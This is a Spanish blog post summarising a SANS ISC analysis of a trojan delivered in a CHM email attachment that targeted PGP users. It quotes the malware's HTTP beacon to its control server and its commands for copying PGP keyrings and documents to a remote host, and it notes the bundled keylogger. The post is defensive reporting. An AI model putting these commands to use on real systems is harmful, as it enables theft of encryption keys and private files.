Principal

PGP bajo ataque!!!

Posted Marzo 27th, 2008 by jbolivar

En reseña publicada hoy por SANS ISC nos cuenta un espeluznante intento de ataque contra el popular software de criptografía PGP; lo impresionante de este ataque es la técnica utilizada, en la cual no se trata de romper el algoritmo en si sino en hacer uso de un troyano para recopilar la información necesaria para acceder a la información de la victima.

Maarten Van Horenbeeck nos cuenta que hace un par de semanas recibió un archivo CHM (Windows Help File) anexado a un correo electrónico, el cual al ser analizado por el antivirus no genero ninguna alarma.

Al descompilar el archivo CHM utilizando aplicaciones como arCHMage o chmdecompiler se observa un código en HTML además de un ejecutable llamado “music.exe”; el objetivo de este archivo es conectarse a un servidor web en Hong Kong utilizando el siguiente comando:

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

Al cual el servidor responde con un mensaje codificado en BASE64, el que contiene un segundo archivo ejecutable, que es invocado por le primer archivo. Este segundo archivo se conecta a otro servidor utilizando el mismo comando descrito anteriormente, al cual el servidor responde con otra cadena de caracteres también codificada en BASE64, la cual contiene la siguiente información:

netmgetr usb:\*.doc
netmgetr usb:\*.pkr
netmgetr usb:\*.skr
netlsr usb:\*.*

Estas son instrucciones que le dicen al troyano que hacer, y al revisar el código se observa que netmgetr escanea el sistema de archivos en busca de patrones y lo que encuentra lo copia hacia un servidor remoto.

Adicionalmente el troyano viene acompañado de un keylogger, el cual en algún momento capturaría la clave PGP del usuario y le daría acceso irrestricto a al información codificada del mismo.

Pero según nos cuenta Van Horenbeeck en su articulo esta no es la intención original del atacante, sino el de mapear con que personas la victima intercambia información codificada, y de esa forma enviar malware a otras personas de una manera mas convincente.

En este caso mas allá del ataque en si, el cual me parece muy bien pensado, es importante recordar en no abrir ningún archivo desconocido así lo halla enviado alguien que conocemos y si lo recibimos confirmar que esta persona en verdad no los envío, porque esta es la mejor defensa que podemos tener ante intentos de intrusión en nuestros datos.

Otra cosa importante que nos deja este caso es el que esta técnica fue dirigida contra PGP, pero puede ser utilizada contra cualquier otro esquema criptográfico fuerte, lo cual seria mucho mas eficiente que atacar la codificación en si.

Como recomendación personal y moraleja, nos queda claro que mas allá de las herramientas utilizadas para asegurar nuestros datos, el problema de seguridad se debe ver como un todo, ya que las herramientas por si solas no son suficientes sino que debe ir acompañadas de políticas y/o practicas acordes para garantizar una seguridad integra en todos los aspectos.